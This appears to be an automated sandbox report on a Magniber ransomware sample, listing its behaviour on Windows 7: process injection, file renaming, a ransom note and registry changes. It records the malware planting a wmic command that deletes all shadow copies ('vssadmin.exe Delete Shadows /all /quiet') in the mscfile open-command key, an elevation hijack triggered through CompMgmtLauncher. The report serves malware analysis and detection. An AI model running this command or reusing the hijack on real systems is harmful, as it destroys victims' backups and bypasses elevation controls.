Malware Analysis Report

2025-01-22 20:47

Sample ID 241211-s7ns2sypgv
Target e22903f461b4ba138bf4cfaee0062c9a_JaffaCakes118
SHA256 0c77b9e8d6fab41fcef61741b7c1676348d874293ef2a1c8463fb2ff6616756d
Tags
magniber defense_evasion discovery execution impact ransomware
score
10/10


Analysis Overview

score
10/10

SHA256

0c77b9e8d6fab41fcef61741b7c1676348d874293ef2a1c8463fb2ff6616756d

Threat Level: Known bad

The file e22903f461b4ba138bf4cfaee0062c9a_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

magniber defense_evasion discovery execution impact ransomware

Magniber family

Magniber Ransomware

Detect magniber ransomware

Process spawned unexpected child process

Deletes shadow copies

Renames multiple (72) files with added filename extension

Drops desktop.ini file(s)

Suspicious use of SetThreadContext

Unsigned PE

System Location Discovery: System Language Discovery

Suspicious use of FindShellTrayWindow

Opens file in notepad (likely ransom note)

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Uses Volume Shadow Copy service COM API

Suspicious use of UnmapMainImage

Suspicious behavior: EnumeratesProcesses

Interacts with shadow copies

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-11 15:46

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-11 15:46

Reported

2024-12-12 09:06

Platform

win7-20240903-en

Max time kernel

118s

Max time network

143s

Command Line

"taskhost.exe"

Signatures

Detect magniber ransomware

Description Indicator Process Target
N/A N/A N/A N/A

Magniber Ransomware

ransomware magniber

Magniber family

magniber

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (72) files with added filename extension

ransomware

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\09OB1FV8\desktop.ini C:\Windows\system32\DllHost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini C:\Windows\system32\DllHost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SK4ZQZYF\desktop.ini C:\Windows\system32\DllHost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WMBPAEF9\desktop.ini C:\Windows\system32\DllHost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y07CWM3B\desktop.ini C:\Windows\system32\DllHost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2116 set thread context of 1116 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\taskhost.exe
PID 2116 set thread context of 1172 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\Dwm.exe
PID 2116 set thread context of 1236 N/A C:\Windows\system32\rundll32.exe C:\Windows\Explorer.EXE
PID 2116 set thread context of 2040 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\DllHost.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{0EF56ED1-B868-11EF-809B-F2DF7204BD4F} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001a0e42ee85f0884dbf8d17461b2df110000000000200000000001066000000010000200000005beb3fea0b67ce1238f5b053d2abd0a52a54e4e979fd1b6bd49b19947701e92d000000000e8000000002000020000000191dd114b789b1619a64dfdbcc784c9fec17db046b25e0fd347040cfcec29b812000000024f4460af3a4ebf817a31752ec32f466b8d66731503975a3db552e9df9ff8c504000000062f7df10c64e8e96e25e398b56d10479d565fa5883fa029bdfddc9b2e91c47a27a5b7220781266890e09e0a8ed588015ad7a8f75e422785e9cad49f89a8c1657 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "440156121" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 107619e5744cdb01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (binary value not preserved in this copy of the report) C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile C:\Windows\system32\taskhost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\DllHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open\command C:\Windows\system32\Dwm.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\Dwm.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open\command C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open\command C:\Windows\system32\taskhost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell C:\Windows\system32\taskhost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open C:\Windows\system32\taskhost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\taskhost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open\command C:\Windows\system32\DllHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open\command C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\Explorer.EXE N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\notepad.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\system32\wbem\wmic.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1116 wrote to memory of 1748 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\notepad.exe
PID 1116 wrote to memory of 1748 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\notepad.exe
PID 1116 wrote to memory of 1748 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\notepad.exe
PID 1116 wrote to memory of 2032 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\cmd.exe
PID 1116 wrote to memory of 2032 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\cmd.exe
PID 1116 wrote to memory of 2032 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\cmd.exe
PID 1116 wrote to memory of 2200 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\wbem\wmic.exe
PID 1116 wrote to memory of 2200 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\wbem\wmic.exe
PID 1116 wrote to memory of 2200 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\wbem\wmic.exe
PID 1116 wrote to memory of 1676 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\cmd.exe
PID 1116 wrote to memory of 1676 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\cmd.exe
PID 1116 wrote to memory of 1676 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\cmd.exe
PID 1676 wrote to memory of 2560 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 1676 wrote to memory of 2560 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 1676 wrote to memory of 2560 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 2032 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2032 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2032 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2356 wrote to memory of 2484 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2356 wrote to memory of 2484 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2356 wrote to memory of 2484 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2356 wrote to memory of 2484 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1488 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 1488 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 1488 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 2752 wrote to memory of 2900 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 2752 wrote to memory of 2900 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 2752 wrote to memory of 2900 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 2040 wrote to memory of 2872 N/A C:\Windows\system32\DllHost.exe C:\Windows\system32\wbem\wmic.exe
PID 2040 wrote to memory of 2872 N/A C:\Windows\system32\DllHost.exe C:\Windows\system32\wbem\wmic.exe
PID 2040 wrote to memory of 2872 N/A C:\Windows\system32\DllHost.exe C:\Windows\system32\wbem\wmic.exe
PID 2040 wrote to memory of 2476 N/A C:\Windows\system32\DllHost.exe C:\Windows\system32\cmd.exe
PID 2040 wrote to memory of 2476 N/A C:\Windows\system32\DllHost.exe C:\Windows\system32\cmd.exe
PID 2040 wrote to memory of 2476 N/A C:\Windows\system32\DllHost.exe C:\Windows\system32\cmd.exe
PID 2476 wrote to memory of 3012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 2476 wrote to memory of 3012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 2476 wrote to memory of 3012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 3064 wrote to memory of 2132 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 3064 wrote to memory of 2132 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 3064 wrote to memory of 2132 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 2132 wrote to memory of 1872 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 2132 wrote to memory of 1872 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 2132 wrote to memory of 1872 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 1236 wrote to memory of 540 N/A C:\Windows\Explorer.EXE C:\Windows\system32\wbem\wmic.exe
PID 1236 wrote to memory of 540 N/A C:\Windows\Explorer.EXE C:\Windows\system32\wbem\wmic.exe
PID 1236 wrote to memory of 540 N/A C:\Windows\Explorer.EXE C:\Windows\system32\wbem\wmic.exe
PID 1236 wrote to memory of 2740 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1236 wrote to memory of 2740 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1236 wrote to memory of 2740 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2740 wrote to memory of 2212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 2740 wrote to memory of 2212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 2740 wrote to memory of 2212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 1660 wrote to memory of 1032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 1660 wrote to memory of 1032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 1660 wrote to memory of 1032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 1032 wrote to memory of 2504 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 1032 wrote to memory of 2504 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 1032 wrote to memory of 2504 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 1172 wrote to memory of 344 N/A C:\Windows\system32\Dwm.exe C:\Windows\system32\wbem\wmic.exe
PID 1172 wrote to memory of 344 N/A C:\Windows\system32\Dwm.exe C:\Windows\system32\wbem\wmic.exe
PID 1172 wrote to memory of 344 N/A C:\Windows\system32\Dwm.exe C:\Windows\system32\wbem\wmic.exe
PID 1172 wrote to memory of 1784 N/A C:\Windows\system32\Dwm.exe C:\Windows\system32\cmd.exe
PID 1172 wrote to memory of 1784 N/A C:\Windows\system32\Dwm.exe C:\Windows\system32\cmd.exe
PID 1172 wrote to memory of 1784 N/A C:\Windows\system32\Dwm.exe C:\Windows\system32\cmd.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\taskhost.exe

"taskhost.exe"

C:\Windows\system32\Dwm.exe

"C:\Windows\system32\Dwm.exe"

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\e22903f461b4ba138bf4cfaee0062c9a_JaffaCakes118.dll,#1

C:\Windows\system32\notepad.exe

notepad.exe C:\Users\Public\readme.txt

